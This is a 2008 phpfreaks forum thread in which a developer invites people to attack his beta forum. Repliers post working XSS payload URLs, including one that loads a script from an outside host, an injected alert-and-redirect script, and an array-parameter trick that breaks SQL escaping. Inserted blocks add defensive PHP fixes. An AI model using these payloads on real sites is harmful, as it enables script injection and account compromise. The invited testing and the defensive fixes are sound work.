Cobalt.Board Posted June 9, 2008

I would like people to test drive a new forum system I am working on. Please feel free to try to break in, change anything, whatever you like. This is a completely open test. You can test it at http://scott.projecth4x0r.com/beta and the admin login is at http://scott.projecth4x0r.com/beta/admin.php if anyone wants to try to get in. We are still working on it and it isn't done yet.

ALSO: We are aware that the search page isn't working.

Link to comment https://forums.phpfreaks.com/topic/109483-new-forum-system/

Coreye Posted June 10, 2008

Cross Site Scripting (XSS): http://scott.projecth4x0r.com/beta/forum.php?name="><marquee><h1>Corey
Cross Site Scripting (XSS): http://scott.projecth4x0r.com/beta/member.php?username="><marquee><h1>Corey
Cross Site Scripting (XSS): You can submit ">code when editing your birthday in your profile.
Cross Site Scripting (XSS): You can submit ">code when editing your website in your profile.
Cross Site Scripting (XSS): You can submit ">code when editing your location in your profile.
Cross Site Scripting (XSS): You can submit ">code when editing the board name from the admin panel.
You can post on boards that don't exist.

Cobalt.Board Posted June 10, 2008 Author

Hey, could you please provide the fix for that?

imdead Posted June 10, 2008

htmlspecialchars($username); ?

keeB Posted June 10, 2008

UI..................................... better than the last one I just saw but not much. Everything is way too compact. Don't be afraid of space. Use it. Use another color aside from gray between the categories as well.

keeB Posted June 10, 2008

In the user list, you properly caught the marquee.. but if I click on the user...
http://scott.projecth4x0r.com/beta/member.php?username=\%22%3E%3Cmarquee%3ECore

helraizer Posted June 11, 2008

On that same note
http://scott.projecth4x0r.com/beta/member.php?username=\%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E
http://scott.projecth4x0r.com/beta/member.php?username=\\\\\\\\\\\\\\\\\\\\\\\'''''''''''''''''''''''''''''''''''''\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\''''''''''''''''''''''''''''''''''''''''''\\\\\\\\\\\\\\\\\\\\\\\\\\\\''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

helraizer Posted June 11, 2008

http://scott.projecth4x0r.com/beta/message.php/

Cobalt.Board Posted June 13, 2008 Author

How can I fix the unsecure admin panel?

imdead Posted June 14, 2008

http://scott.projecth4x0r.com/beta/member.php?username[]
^ ^ ^
Layout Is Out Of Place + Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /home/scott/public_html/beta/connect.php on line 10

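Added example (not part of any post in this thread, and not the forum's own code): a PHP illustration of the two fixes the reports above point to, encoding `username` with `htmlspecialchars()` at output as imdead suggested, and rejecting non-string input such as `?username[]` before it reaches `mysql_real_escape_string()`. The helper names `request_string()` and `h()`, the 64-byte limit and the `<input>` markup are assumptions.

```php
<?php
// Added example: hypothetical helpers, not code from the forum under test.

/** Return a request parameter only if it is a non-empty string. */
function request_string(array $source, string $key, int $maxLen = 64): ?string
{
    if (!isset($source[$key]) || !is_string($source[$key])) {
        return null; // missing, or an array such as the one PHP builds from ?username[]
    }
    $value = trim($source[$key]);
    if ($value === '' || strlen($value) > $maxLen) {
        return null;
    }
    return $value;
}

/** Encode a value for HTML text and quoted-attribute contexts. */
function h(string $value): string
{
    // ENT_QUOTES also encodes ' so the value is safe inside either quote style.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample requests mirroring the reports in this thread.
$samples = [
    ['username' => 'Corey'],
    ['username' => '"><marquee><h1>Corey'],
    ['username' => ['x']], // shape of $_GET for member.php?username[]=x
];

foreach ($samples as $get) {
    $username = request_string($get, 'username');
    if ($username === null) {
        echo "400 Bad Request: username must be a non-empty string\n";
        continue;
    }
    // Assumed vulnerable form: echo '<input value="' . $username . '">';
    // SQL escaping (or added backslashes) does not neutralise "> in HTML;
    // the value has to be encoded at every place it is written into a page.
    echo '<input name="username" value="' . h($username) . '">' . "\n";
}
```

The same `h()` call applies to the stored fields reported earlier (birthday, website, location, board name): encode when the value is written into the page, on every page that displays it.
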
TheFilmGod Posted June 15, 2008

I get an "owned" message and a page redirect to youtube's "rick rolled." lol

helraizer Posted June 15, 2008

Someone changed the title of the page to "<script>alert('owned');location.href='http://www.youtube.com/watch?v=...';</script>". Need to change that.

Cobalt.Board Posted June 15, 2008 Author

Hey, I know how to fix the board name HTML, just not how people are getting INTO the admin control panel. Anyone want to tell me?

Daniel0 Posted June 15, 2008

Hehe... ooops

Cobalt.Board Posted June 15, 2008 Author

Care to tell me how people are getting in?

Daniel0 Posted June 15, 2008

In this case, people = me. I honestly don't know how, but the account I registered was given access to the admin panel.

Edit: If you post the part of the code that determines whether a user should be allowed access to the admin panel or not, then perhaps I'll be able to infer the reason.

allistera Posted June 15, 2008

Yup someone hacked it.

Daniel0 Posted June 15, 2008

> Yup someone hacked it.

Good job, Sherlock. I just said it was me...

Cobalt.Board Posted June 16, 2008 Author

I found the problem with it, I will try to fix it by the end of tomorrow.

Daniel0 Posted June 16, 2008

> I found the problem with it, I will try to fix it by the end of tomorrow.

I see you removed the JavaScript I injected, however, the issue is still not fixed.

allenskd Posted June 17, 2008

I'm a bit unsettled but here it goes, why are there third-party scripts in this?
http://scott.projecth4x0r.com/beta/search/
http://scott.projecth4x0r.com/beta/search/readme.txt
http://scott.projecth4x0r.com/beta/search/setup.php
If you got permission that's fine, but if you plan on marketing your forum you can't use other people's code without permission.

helraizer Posted June 17, 2008

One point I've noticed is that your signature strips all HTML, which is fine. However, when you use BBCode it converts it to HTML, so when you go back to change your signature, what you already have is then stripped out.

Also, my signature is 999x999px. So you may want to limit the size of signatures.

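Added example (not part of any post in this thread, and not the forum's own code): one way to avoid the round-trip problem helraizer describes is to store the signature as the BBCode the user typed and convert it to HTML only when it is displayed, escaping first. The function name `render_signature()`, the three supported tags and the 500x150 pixel display cap are assumptions.

```php
<?php
// Added example: hypothetical renderer, not the forum's code.

const SIG_MAX_W = 500; // assumed display limits in pixels
const SIG_MAX_H = 150;

function render_signature(string $bbcode): string
{
    // 1. Escape everything first, so raw HTML in the stored text is inert.
    $html = htmlspecialchars($bbcode, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // 2. Convert a small whitelist of tags on the already-escaped text.
    $html = preg_replace('#\[b\](.*?)\[/b\]#is', '<strong>$1</strong>', $html);
    $html = preg_replace('#\[i\](.*?)\[/i\]#is', '<em>$1</em>', $html);

    // 3. Images: http(s) URLs only, with the displayed size capped.
    $html = preg_replace_callback(
        '#\[img\](https?://[^\s\[\]"<>]+)\[/img\]#i',
        function (array $m): string {
            // $m[1] was escaped in step 1, so it cannot close the attribute.
            return sprintf(
                '<img src="%s" alt="" style="max-width:%dpx;max-height:%dpx">',
                $m[1], SIG_MAX_W, SIG_MAX_H
            );
        },
        $html
    );
    return nl2br($html);
}

// Constructed sample: exactly what the user typed. Store this string unchanged.
$stored = "[b]helraizer[/b] <script>alert(1)</script>\n"
        . "[img]http://example.com/sig.png[/img]";

// Edit form: show the stored BBCode back, encoded for the textarea,
// so nothing is lost when the user edits the signature again.
echo '<textarea name="signature">'
   . htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
   . "</textarea>\n";

// Display: convert to HTML only at render time.
echo render_signature($stored), "\n";
```
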
Cobalt.Board Posted June 18, 2008 Author

For the people that are putting js in, we are all out of town and cannot fix it. I could try to fix it on my iPhone but that would take a while.

Cobalt.Board Posted June 19, 2008 Author

Admin panel now removes JS and all HTML. Good luck. I tested it, normal users can now NOT get into admin CP.

Coreye Posted June 19, 2008

> Admin panel now removes JS and all HTML. Good luck. I tested it, normal users can now NOT get into admin CP.

Users can still get into the admin panel and it doesn't remove HTML or JS.